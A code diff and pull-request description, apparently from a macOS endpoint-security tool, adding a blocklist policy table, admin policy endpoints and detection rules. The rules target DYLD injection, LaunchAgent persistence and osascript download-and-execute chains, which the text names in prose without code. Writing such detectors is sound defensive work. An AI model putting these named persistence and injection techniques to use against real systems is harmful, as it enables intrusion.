+	// migration. `version` is a monotonically-increasing integer bumped on every admin PUT;
+	// agents cache the last-applied version and skip no-op updates.
+	`CREATE TABLE IF NOT EXISTS policies (
+		id          BIGINT AUTO_INCREMENT PRIMARY KEY,
+		name        VARCHAR(64)  NOT NULL,
+		version     BIGINT       NOT NULL DEFAULT 1,
+		blocklist   JSON         NOT NULL,
+		updated_at  TIMESTAMP(6) NOT NULL DEFAULT CURRENT_TIMESTAMP(6),
+		updated_by  VARCHAR(255) NOT NULL DEFAULT 'system',
+		UNIQUE KEY uk_policies_name (name)
+	)`,
+	// Seed the default policy row. Using INSERT IGNORE so restarts don't clobber an edited
+	// row. The initial blocklist is empty — operators opt in to blocking via PUT.
+	`INSERT IGNORE INTO policies (name, version, blocklist, updated_by)
+	 VALUES ('default', 1, JSON_OBJECT('paths', JSON_ARRAY(), 'hashes', JSON_ARRAY()), 'system')`,
 }
 
 // Event represents the canonical event envelope.


### PR DESCRIPTION
…osascript chain attacks

- Introduce a test for all detection rules to evaluate together.
- Implement individual rules:
  - `persistence_launchagent`: Detect macOS launchctl targeting LaunchAgents.
  - `dyld_insert`: Detect execution with DYLD injection environment variables.
  - `osascript_network_exec`: Detect osascript processes launching downloads and temporary executables.
- Provide test coverage for all new rules, including edge cases and negative scenarios.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

## Release Notes

* **New Features**
  * Admins can now create and update blocklist policies via new admin API endpoints (GET/PUT `/api/v1/admin/policy`).
  * Enrolled agents automatically receive and enforce the current policy on startup and subsequent updates.
  * Added five new detection rules for suspicious behaviors: process injection, dynamic library loading, shell execution from Office apps, launch agent persistence, and network access via script execution.

* **Tests**
  * Comprehensive test coverage for policy management, detection rules, and agent enrollment workflows.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->